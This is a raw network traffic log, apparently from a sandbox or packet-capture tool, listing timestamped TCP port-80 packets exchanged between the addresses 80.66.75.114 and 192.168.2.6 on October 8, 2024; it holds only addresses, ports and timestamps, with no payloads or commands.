                                                Oct 8, 2024 04:24:39.415726900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415731907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415736914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415745974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415752888 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415760994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415766001 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415771961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415781975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415786982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415792942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415807009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415807962 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415818930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415828943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415831089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415848970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415879965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415926933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415937901 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415946960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415956020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415966034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415976048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415987968 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416004896 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416032076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416042089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416050911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416059971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416069031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416076899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416079998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416099072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416114092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416282892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416325092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416361094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416372061 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416379929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416388988 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416398048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416404009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416408062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.416429043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.416440964 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.444530010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444540024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444552898 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444561958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444572926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444582939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.444587946 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.444619894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.444631100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513278961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513354063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513415098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513421059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513461113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513463020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513483047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513520956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513525963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513576984 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513586998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513648987 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513663054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513701916 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513711929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513768911 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513773918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513830900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513835907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513883114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513890982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513935089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.513936043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513979912 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.513998032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514044046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514045000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514090061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514108896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514153957 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514153957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514199018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514203072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514247894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514267921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514312029 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514328003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514373064 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514390945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514436007 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514451981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514496088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514497042 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514539003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514543056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514588118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514602900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514648914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514667034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514712095 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514727116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514772892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514772892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514811039 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514822006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514864922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514872074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514918089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514916897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.514961958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.514978886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515024900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515038967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515084028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515105009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515150070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515156031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515196085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515197039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515260935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515281916 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515327930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515328884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515377045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515422106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515486956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515533924 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515547037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515595913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515605927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515642881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515649080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515700102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515707970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515753984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515754938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515803099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515827894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515847921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515853882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515894890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515898943 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515942097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515944004 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.515990973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.515995026 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516041040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516084909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516124010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516124010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516128063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516174078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516176939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516220093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516222954 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516264915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516266108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516311884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516314983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516357899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516402006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516412020 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516447067 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516448021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516493082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516491890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516537905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516539097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516582966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516582966 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516628981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516671896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516706944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516706944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516716003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516762972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516765118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516808987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516808987 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516858101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516861916 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516905069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516944885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.516980886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516980886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.516988039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517034054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517038107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517079115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517080069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517127037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517127037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517169952 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517173052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517220020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517262936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517272949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517308950 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517311096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517352104 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517354965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517399073 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517401934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517443895 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517447948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517493010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517537117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517551899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517579079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517585039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517632961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517633915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517678976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517678976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517720938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517724991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517769098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517770052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517815113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517827034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517862082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517864943 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517906904 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517908096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517952919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.517955065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.517998934 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518002033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518048048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518090963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518104076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518136024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518141985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518179893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518184900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518227100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518228054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518270016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518274069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518318892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518321037 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518364906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518369913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518409967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518414021 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518455982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518459082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518502951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518503904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518548012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518548965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518594980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518640995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518651009 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518687963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518692017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518735886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518737078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518781900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518783092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518830061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518831015 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518872023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.518877983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.518939972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604743958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604805946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604808092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604827881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604845047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604851961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604868889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604891062 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604898930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604917049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604938984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604942083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604957104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604958057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604969025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604983091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604995966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605009079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605011940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605036020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605052948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605057001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605081081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605083942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605103016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605107069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605124950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605132103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605146885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605159044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605170965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605178118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605201006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605201006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605220079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605223894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605242014 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605245113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605264902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605271101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605285883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605287075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605314016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605318069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605330944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605354071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605359077 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605384111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605393887 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605402946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605424881 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605426073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605433941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605456114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605468988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605475903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605494022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605499029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605511904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605514050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605547905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605561972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605571985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605586052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605592012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605608940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605626106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605654955 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605654955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605663061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605678082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605693102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605699062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605720997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605727911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605736971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605751038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605770111 CEST804973880.66.75.114192.168.2.6
